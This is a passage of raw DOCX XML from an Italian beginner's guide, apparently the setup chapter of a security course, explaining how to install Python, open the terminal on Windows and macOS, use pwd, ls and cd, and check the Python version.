        <w:t xml:space="preserve">Scarica il file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.pkg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per la versione 3.12 (o successiva).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aprilo e segui l’installer (Avanti, Avanti, Installa, password di sistema).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Su macOS non serve la spunta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Add to PATH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— l’installer la fa automaticamente.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:id="24" w:name="X726c5fb8fa984c6780ac2e5489c1446f2014899"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verifica che Python sia installato correttamente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adesso devi aprire il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">terminale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per controllare che Python risponda. Se non hai mai aperto un terminale, niente paura: lo facciamo nella prossima sezione. Per ora limitati a continuare a leggere.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:id="32" w:name="Xbe0fe3c95f8b770dd62f2ee31cac8ea76646873"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="441" w:name="sec_0_3"/>
      <w:r>
        <w:t xml:space="preserve">0.3 Il terminale: cos’è, come si apre, perché ci serve</w:t>
      </w:r>
      <w:bookmarkEnd w:id="441"/>
    </w:p>
    <w:bookmarkStart w:id="26" w:name="cosè-il-terminale"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cos’è il terminale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">terminale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(chiamato anche</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">console</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">prompt dei comandi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) è una finestra in cui scrivi comandi testuali al computer e ricevi risposte testuali. È il modo con cui i programmatori dicono al sistema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">fai questo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">installa quello</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">avvia quel programma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Sembra antiquato perché non ha pulsanti, ma per lo sviluppo è insostituibile: ogni operazione ha un comando esatto, ripetibile, scriptabile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per il corso di sicurezza è ancora più importante:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">gli attacchi si lanciano spesso dal terminale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e gli strumenti di analisi sono quasi tutti a riga di comando. Diventa amico del terminale prima possibile.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkStart w:id="27" w:name="come-si-apre-il-terminale-su-windows"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Come si apre il terminale su Windows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Su Windows abbiamo più opzioni. Useremo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(più moderno) o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Terminal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(più moderno ancora, se è già installato).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Modo 1 — il più veloce:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Premi i tasti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Windows + X</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">contemporaneamente.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Si apre un menu. Clicca su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Terminal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(su Windows 11) o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Windows PowerShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(su Windows 10).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Modo 2:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Clicca su Start (o premi il tasto Windows).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Scrivi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e premi Invio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">📷</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">una finestra di PowerShell appena aperta, con il prompt blu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PS C:\Users\NomeUtente&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">visibile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5669280" cy="2645664"/>
            <wp:docPr id="3" name="Picture 3"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="screenshot_03_una_finestra_di_PowerShell_appena_aperta_con_il_prompt_blu_P.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="2645664"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vedrai una finestra blu (o nera) con qualcosa tipo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PS C:\Users\TuoNome&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PS C:\Users\TuoNome&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">prompt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: ti sta dicendo che è pronto a ricevere comandi e che attualmente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ti trovi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nella cartella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Users\TuoNome</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Il prompt finisce con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Tutto quello che scriverai lo scriverai dopo questo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:id="28" w:name="come-si-apre-il-terminale-su-macos"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Come si apre il terminale su macOS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Premi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cmd + Spazio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per aprire Spotlight.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scrivi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Terminal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e premi Invio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vedrai una finestra con un prompt tipo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">TuoNome@MacBook-Pro ~ %</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="29" w:name="i-primi-tre-comandi-da-imparare-subito"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I primi tre comandi da imparare subito</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Indipendentemente dal sistema operativo, prova questi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mostra in quale cartella ti trovi adesso (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">print working directory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Premi Invio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(su Windows funziona anche</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dir</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) Mostra i file e le cartelle nella cartella corrente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cd Desktop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">change directory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) Sposta il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tu sei qui</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del terminale dentro la cartella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Desktop</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Per tornare indietro:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cd ..</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(con due punti).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">⚠️</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Attenzione ai comandi che digiti.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Il terminale esegue</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">esattamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">quello che scrivi. Se sbagli un carattere, sbaglia il comando. Se cancelli un file, è cancellato (sul terminale non esiste il cestino). Per ora useremo solo comandi sicuri, ma è bene saperlo subito.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="31" w:name="verifica-che-python-risponda"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verifica che Python risponda</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adesso che sai aprire il terminale, verifichiamo che Python sia installato bene. Nel terminale digita:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python --version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">e premi Invio. Dovresti vedere una riga simile a:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Python 3.12.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(il numero esatto può cambiare). Se vedi qualcosa del genere,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Python è installato correttamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, sei a posto, vai alla sezione successiva.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="30" w:name="cosa-fare-se-vedi-un-errore"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cosa fare se vedi un errore</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Su Windows, se vedi:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">'python' is not recognized as an internal or external command, operable program or batch file.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ Hai dimenticato la spunta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Add python.exe to PATH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">durante l’installazione.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Rimedio:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">disinstalla Python (Pannello di controllo → Programmi → Disinstalla</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Python 3.12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) e reinstallalo, ricordandoti questa volta di mettere la spunta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Su Windows 11, se vedi:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">una finestra del Microsoft Store che si apre da sola e ti propone di installare Python.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ Stai usando una versione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">fantasma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di Python preinstallata da Microsoft. Chiudi il Microsoft Store. Riprova con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">py --version</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">invece di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python --version</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Se funziona, useremo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
